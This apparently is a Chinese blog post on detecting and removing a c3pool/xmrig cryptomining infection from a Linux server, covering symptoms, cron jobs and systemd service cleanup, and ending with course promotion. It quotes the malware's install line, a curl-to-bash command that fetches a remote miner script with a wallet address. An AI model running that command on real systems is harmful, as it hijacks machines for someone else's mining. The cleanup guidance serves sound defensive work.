挖矿平台：猫池

病毒来源安装脚本

cat /root/c3pool/config.json

crontab -r
cd /root/c3pool

curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 44SLpuV4U7gB6RNZMCweHxWug7b1YUir4jLr3RBaVX33QxjJdzzcMA2bvwo6P4i6AxZjzsh227W3SjodscE45xFD7iXuW12

![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/3c09fcc5fdd5439b80a6cc9f7ea3a8b1.png)
旷池提供的卸载脚本

curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/uninstall_c3pool_miner.sh | bash -s

中毒现象

高cpu和高内存占用
![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/6f61676fd46e43b7a86c338f54936be9.png)
kill -9 杀掉之后自动重启
![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/434e4d66f1ab4dfb9b953053346cb755.png)
![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/f989b238696545ad928ab8bd24d26907.png)
进程ip：47.76.163.177 为美国IP，IP查询
![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/d2397b1731804bd0aca0482b334a9c92.png)

查杀过程

查找病毒脚本位置find / -name xmrig
![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/e7b90bc0076846c8b95e6dbe350b7636.png)

检查是否有相关的定时任务

crontab -l

如果有定时任务则删除掉
![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/1b3e107776d844e1ac1a336162eb2a67.png)

find / -name cron* -type d

查找自启动服务

因为kill -9杀掉进程之后会立即重启，需找到自启动服务，禁用后删除

systemctl list-units --type=service

![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/47798d2ae8be4d409918f0e8bc998b63.png)

find / -name c3pool_miner.service

找到所有相关的服务，全部删除

# 关闭自启动
systemctl disable c3pool_miner.service
# 停止服务
systemctl stop c3pool_miner.service
# 删除服务
rm -f /etc/systemd/system/c3pool_miner.service

![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/75fca3435b7d451d8573979df31d2660.png)
最后将脚本文件删除

rm -rf /root/c3pool/

【安全】查杀linux上c3pool挖矿病毒xmrig
【安全】查杀linux挖矿病毒
kswapd0
【安全】查杀linux隐藏挖矿病毒rcu_tasked
【安全】挖矿木马自助清理手册

网络安全工程师(白帽子)企业级学习路线

第一阶段：安全基础（入门）

第二阶段：Web渗透（初级网安工程师）

第三阶段：进阶部分（中级网络安全工程师）

如果你对网络安全入门感兴趣，那么你需要的话可以点击这里👉网络安全重磅福利：入门&进阶全套282G学习资源包免费分享！

学习资源分享